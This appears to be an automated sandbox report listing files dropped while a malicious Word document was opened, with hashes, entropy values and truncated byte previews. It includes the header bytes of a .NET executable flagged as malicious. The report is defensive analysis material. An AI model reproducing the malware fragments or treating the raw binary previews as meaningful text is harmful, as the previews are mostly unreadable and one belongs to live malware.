                                                                                                                                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.q.Y.a.6.3.X.Y.9.b.4.Y.b.C.Z.g.f.0.u.y.E.6.v.n.x.e.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".E.8.Q.Z.0./.5.J.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.4.v.S.e.g.D.

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRF{1EF8EA5B-12B2-48C0-B051-31C0EB030E95}.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):32768
                                                                                                                                                Entropy (8bit):3.719226553592012
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:ctv/HQAzfTJVP760j3P9qS1cE52ftBpIz/:dAr1VP+Zw
                                                                                                                                                MD5:6E2B4083BA370A456603D6C7598C6BA7
                                                                                                                                                SHA1:7BF524413523C037B03C3AB44E8FF163DAE12F67
                                                                                                                                                SHA-256:67AFEB5EC4AB62A26BC057FE517AB72F70EA278B26BACC2CDC5C7813089956DA
                                                                                                                                                SHA-512:856FA01F9D6044532D6BFFEE06A2B13B284D793588B3656EDB09D060FA02430F8CC0875CA85E106AD2AC3D1E47178CC823C75CD1005BC091D175F0CDD072020F
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{B676F3A6-423F-45FA-957E-ED247863F196}.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1024
                                                                                                                                                Entropy (8bit):0.05194905805374581
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:1lvlxlln:vz
                                                                                                                                                MD5:FB294ADA09B99EF2DEFEDC229C6C3EF7
                                                                                                                                                SHA1:D15075354757A59DE6E057435511D956663955FB
                                                                                                                                                SHA-256:8B2E62CCAF3758D056D38071A1C4E0F0C9402FEC9F951801E394020235F8C099
                                                                                                                                                SHA-512:AF6EFE82BEB4C57C61A5F769AE95810A277A5A791F698FE3BCF957197804D91A3170B505D5CD353870121D2F4A99131C61A41E0779DB51821845DD046490D09E
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\cfdhxdzhtfxgh[1].exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):177664
                                                                                                                                                Entropy (8bit):7.757333394091002
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:/Qv8/m8hRr4ZWmhtRGKTCaWzUp0jxrZmHM26XF1g39JZY6Rd:/k83r4MmhvGKTpa1tXUJLd
                                                                                                                                                MD5:94A7E3859C2E4238421CDFE73D49603C
                                                                                                                                                SHA1:03F03C5B5D8CF362AA52B9E793E7BE398D779C21
                                                                                                                                                SHA-256:639135EB69333ABA7ECB762072D8BEF1D2DB83E54EDBE627DD223039142B8C91
                                                                                                                                                SHA-512:74048463606F7017BD8BD3C92773EDDE5A406247C5EA437B8EE580A3D9E65EB755AA44DE466FC2AABEF8B9A67C40163AFEB3DF9BC9FB35F8AFE20814D5DE85B5
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: TRANSFERENCIA COMPROBANTES.lnk, Detection: malicious, Browse
                                                                                                                                                • Filename: Transferencia.lnk, Detection: malicious, Browse
                                                                                                                                                • Filename: dHrrqccwkL.doc, Detection: malicious, Browse
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....sVg................................ ........@.. ....................................`.....................................S.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......0a..h\..........................................................f#........X...B..4.d........r.).#..P..J. Og$..7&.\....Y^.._..H...f..+..........k.....&.*!g..>Y...O=x........&L.8.Y....1........I.D9p.QR..I..Z.-%.].-.'.z..P....."..$........j,..AHz...5..6..7.'.....Li$.^u\F.X.....V2..^.....*#^.X.u@.p...^....' .r.dQ..xR..v>u.C.m8.....>)..0lk.E...#..3a..u...:........[7..Z.w#....'F..r..N.s....X.Z...bl.......1.;..*..D.JA-d....G..(..|.N.q.W.|.U...X

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):64
                                                                                                                                                Entropy (8bit):1.1940658735648508
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Nlllul/nq/llh:NllUyt
                                                                                                                                                MD5:AB80AD9A08E5B16132325DF5584B2CBE
                                                                                                                                                SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                                                                                                                                                SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                                                                                                                                                SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:@...e................................................@..........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\ .doc

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\wscript.exe
                                                                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: admin, Template: Normal.dotm, Last Saved By: oplup, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Sun Dec 8 09:02:00 2024, Last Saved Time/Date: Sun Dec 8 09:04:00 2024, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):199680
                                                                                                                                                Entropy (8bit):7.547374221413506
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:a877VGZ5Sd3b4e0wNZtsqXNKd5AvDJW4S+I/tZ6X1bpF6mfTm:DGZYwAZHMCDJ8/u5pAmbm
                                                                                                                                                MD5:7EA9DA3DD3DB6F3FADF04AC76B54434B
                                                                                                                                                SHA1:B30B950191046D999E71AAA54FB2648C6655CE9B
                                                                                                                                                SHA-256:947BCE97211371E730A2B8B79C2EC4D154904E8FAA7BED2583C5C6C420230170
                                                                                                                                                SHA-512:F94EB382DEDB8C3952DBC0F3B9040201455CEC641C845BEDF5765A2772AA98CB20D92B3E0EDADCD92FD7CDB77E7C6F37D26BDD276CCEEA733237E28F04240F9D
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:......................>.......................]...........`...............Z...[...\.............................................................................................................................................................................................................................................................................................................................................................................................................................................._.............................bjbj,E,E..........................N/..N/....................................................................................6.......6...............................................................................................................f.......................................................................I...h.......h.......h.......h.......h.......h...$...M...........>.........................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App1733723550718024600_A0E72725-605B-4822-B4DB-BD5E739C51EF.log

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:ASCII text, with very long lines (1282), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):20971520
                                                                                                                                                Entropy (8bit):0.014231070498289672
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:IMTicjuY7j7IVktUWAnyj91Py7lLOfQEtB:h
                                                                                                                                                MD5:A5865C462CA636F9882BF87CBB3B532D
                                                                                                                                                SHA1:792C7573D48DED68E08C7BDC8EBD85093F6D4CDD
                                                                                                                                                SHA-256:30DE38D5B6407F7B5247AEC10B9868E90491D21B94518C46F6679728F9EBBD8C
                                                                                                                                                SHA-512:D71980C9700276B8C6D00C69319F2BB806A5408EEC7D87DEA69BFA173B27F16CB750DC5AC24C811B9B01A72426F22EF1689DD74BEC857372788520CFDBCDC7AA
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..12/09/2024 05:52:30.936.WINWORD (0x1C48).0x1C90.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.LoadXmlRules","Flags":33777014401990913,"InternalSequenceNumber":23,"Time":"2024-12-09T05:52:30.936Z","Contract":"Office.System.Activity","Activity.CV":"JSfnoFtgIki0271ec5xR7w.7.1","Activity.Duration":171,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Activity.Result.Code":-2147024890,"Activity.Result.Type":"HRESULT","Activity.Result.Tag":528307459}...12/09/2024 05:52:30.952.WINWORD (0x1C48).0x1C90.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.ProcessIdleQueueJob","Flags":33777014401990913,"InternalSequenceNumber":25,"Time":"2024-12-09T05:52:30.952Z","Contract":"Office.System.Activity","Activity.CV":"JSfnoFtgIki0271ec5xR7w.7","Activity.Duration":12432,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Data.Failure

                                                                                                                                                C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App1733723550718832500_A0E72725-605B-4822-B4DB-BD5E739C51EF.log

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):20971520
                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3::
                                                                                                                                                MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                                                                                                                                SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                                                                                                                                SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                                                                                                                                SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD745A.tmp\BracketList.glox

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4026
                                                                                                                                                Entropy (8bit):7.809492693601857
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
                                                                                                                                                MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                                                                                                                                                SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                                                                                                                                                SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                                                                                                                                                SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK........YnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........bnB;?.......f......._rels/.rels...J.1.._%..f....m/.,x...&.lt.dV.y.|.."v....q..|......r..F..)..;.T5g.eP..O..Z.^-.8...<.Y....Q.."....*D.%.!9.R&#".'0(.u}).!..l....b..J..rr....P.L.w..0.-......A..w..x.7U...Fu<mT.....^s...F./ ..( .4L..`.....}...O..4.L...+H.z...m..j[].=........oY}.PK........J.L6...m....,.......diagrams/layout1.xml.X.n.8.}N.....PG.............wZ.,.R.%.K...J.H]....y.3..9...O..5."J.1.\.1....Q....z......e.5].)...$b.C)...Gx!...J3..N..H...s....9.~...#..$...W.8..I`|..0xH}......L.|..(V;..1...kF..O=...j...G.X.....T.,d>.w.Xs.......3L.r..er\o..D..^....O.F.{:.>.R'....Y-...B.P.;....X.'c...{x*.M7..><l.1.w..{].46.>.z.E.J.......G......Hd..$..7....E.

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD745A.tmp\Content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):250
                                                                                                                                                Entropy (8bit):3.4916022431157345
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXsAl8xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8A8xoGHmD0+dAH/luWvv
                                                                                                                                                MD5:1A314B08BB9194A41E3794EF54017811
                                                                                                                                                SHA1:D1E70DB69CA737101524C75E634BB72F969464FF
                                                                                                                                                SHA-256:9025DD691FCAD181D5FD5952C7AA3728CD8A2CAF20DEA14930876419BED9B379
                                                                                                                                                SHA-512:AB29C8674A85711EABAE5F9559E9048FE91A2F51EB12D5A46152A310DE59F759DF8C617DA248798A7C20F60E26FBB1B0FC8DB47C46B098BCD26CF8CE78989ACA
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.r.a.c.k.e.t.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD749A.tmp\Content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):254
                                                                                                                                                Entropy (8bit):3.4845992218379616
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXQFoElh/lE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8lLGHmD0+dAH/luWvv
                                                                                                                                                MD5:E8B30D1070779CC14FBE93C8F5CF65BE
                                                                                                                                                SHA1:9C87F7BC66CF55634AB3F070064AAF8CC977CD05
                                                                                                                                                SHA-256:2E90434BE1F6DCEA9257D42C331CD9A8D06B848859FD4742A15612B2CA6EFACB
                                                                                                                                                SHA-512:C0D5363B43D45751192EF06C4EC3C896A161BB11DBFF1FC2E598D28C644824413C78AE3A68027F7E622AF0D709BE0FA893A3A3B4909084DF1ED9A8C1B8267FCA
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .H.e.x.a.g.o.n.R.a.d.i.a.l...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD749A.tmp\HexagonRadial.glox

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):6024
                                                                                                                                                Entropy (8bit):7.886254023824049
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
                                                                                                                                                MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                                                                                                                                                SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                                                                                                                                                SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                                                                                                                                                SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........2..<..]#.....'......diagrams/layout1.xml.].r.8...V.;0.;..aO........{.....V..3].d{..............\. .#.t... ........x<...@7o.]..7.N..@.NF..../....S.../.xC..U...<..Q.=...|..v.....cQ..Y=.....i`.. ..?.;...Go....x.O.$....7s..0..qg....|..r..l.w.a..p.3.Em7v...N............3..7...N.\\..f...9...U$..7...k.C..M.@\.s....G/..?...I...t.Yos...p..z...6.lnqi.6..<..1qg+......#]....|C/N..K\}.....#..".

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD749B.tmp\Content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):252
                                                                                                                                                Entropy (8bit):3.4680595384446202
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXivlE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyydGHmD0+dAH/luWvv
                                                                                                                                                MD5:D79B5DE6D93AC06005761D88783B3EE6
                                                                                                                                                SHA1:E05BDCE2673B6AA8CBB17A138751EDFA2264DB91
                                                                                                                                                SHA-256:96125D6804544B8D4E6AE8638EFD4BD1F96A1BFB9EEF57337FFF40BA9FF4CDD1
                                                                                                                                                SHA-512:34057F7B2AB273964CB086D8A7DF09A4E05D244A1A27E7589BDC7E5679AB5F587FAB52A2261DB22070DA11EF016F7386635A2B8E54D83730E77A7B142C2E3929
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .a.r.c.h.i.t.e.c.t.u.r.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD749B.tmp\architecture.glox

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):5783
                                                                                                                                                Entropy (8bit):7.88616857639663
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
                                                                                                                                                MD5:8109B3C170E6C2C114164B8947F88AA1
                                                                                                                                                SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                                                                                                                                                SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                                                                                                                                                SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........A;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........pnB;.M.:....g......._rels/.rels...J.0.._%.n....xp..,{.i2M.........G..........7...3o/.......d.kyU....^..[>Q....j.#P.H......Z>..+!...B*|@...G...E....E]..".3.......!..7....,:..,.......Ot..0r....Z..&1..U..p.U-.[Uq&.......................Gyy.}n.(.C(i.x........?.vM..}..%.7.b.>L..]..PK........EV:5K..4....H......diagrams/layout1.xml.Yo.6........S.`......$M...Q8A...R..T.k...K.4CQG..}.A..9.?R....!&...Q..ZW.......Q....<8..z..g....4{d.>..;.{.>.X.....Y.2.......cR....9e.. ...}L.....yv&.&...r..h...._..M. e...[..}.>.k..........3.`.ygN...7.w..3..W.S.....w9....r(....Zb..1....z...&WM.D<......D9...ge......6+.Y....$f......wJ$O..N..FC..Er........?..is...-Z

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD74BB.tmp\Content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):254
                                                                                                                                                Entropy (8bit):3.4721586910685547
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUX9+RclTloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyteUTloGHmD0+dAH/luWvv
                                                                                                                                                MD5:4DD225E2A305B50AF39084CE568B8110
                                                                                                                                                SHA1:C85173D49FC1522121AA2B0B2E98ADF4BB95B897
                                                                                                                                                SHA-256:6F00DD73F169C73D425CB9895DAC12387E21C6E4C9C7DDCFB03AC32552E577F4
                                                                                                                                                SHA-512:0493AB431004191381FF84AD7CC46BD09A1E0FEEC16B3183089AA8C20CC7E491FAE86FE0668A9AC677F435A203E494F5E6E9E4A0571962F6021D6156B288B28A
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.e.v.r.o.n.a.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD74BB.tmp\chevronaccent.glox

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4243
                                                                                                                                                Entropy (8bit):7.824383764848892
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
                                                                                                                                                MD5:7BC0A35807CD69C37A949BBD51880FF5
                                                                                                                                                SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                                                                                                                                                SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                                                                                                                                                SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK........NnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........TnB;..d.....h......._rels/.rels...J.0.._%.n..)"....<.w.&.4..!...y.|.........|.&3.o.....S..K.T5g.U....g..n.f....T*.hcf...D.V..Ft....d....c2".z.....N.s._2....7.0.V.]P.CO?...`...8....4&......_i..Y.T...Z...g....{-...]..pH..@.8....}tP.)..B>..A...S&......9..@...7........b_.PK........r};5.z..............diagrams/layout1.xml.X.n.8.}.........4.+.(...@......(..J..._.!)..b..v.}.H..zf8...dhM....E..I.H..V.Y.R..2zw5L~....^..]...J_..4.\.\......8..z..2T..".X.l.F#......5....,*....c....r.kR.I.E..,.2...&%..''.qF.R.2.....T;F...W.. ...3...AR.OR.O..J}.w6..<...,.x..x....`g?.t.I.{.I...|X..g.....<BR..^...Q.6..m.kp...ZuX.?.z.YO.g...$.......'.]..I.#...]$/~`${.

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD74BC.tmp\Content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):264
                                                                                                                                                Entropy (8bit):3.4866056878458096
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUX0XrZUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXWloGHmD0+dAH/luWvv
                                                                                                                                                MD5:6C489D45F3B56845E68BE07EA804C698
                                                                                                                                                SHA1:C4C9012C0159770CB882870D4C92C307126CEC3F
                                                                                                                                                SHA-256:3FE447260CDCDEE287B8D01CF5F9F53738BFD6AAEC9FB9787F2826F8DEF1CA45
                                                                                                                                                SHA-512:D1355C48A09E7317773E4F1613C4613B7EA42D21F5A6692031D288D69D47B19E8F4D5A29AFD8B751B353FC7DE865EAE7CFE3F0BEC05F33DDF79526D64A29EB18
                                                                                                                                                Malicious:false
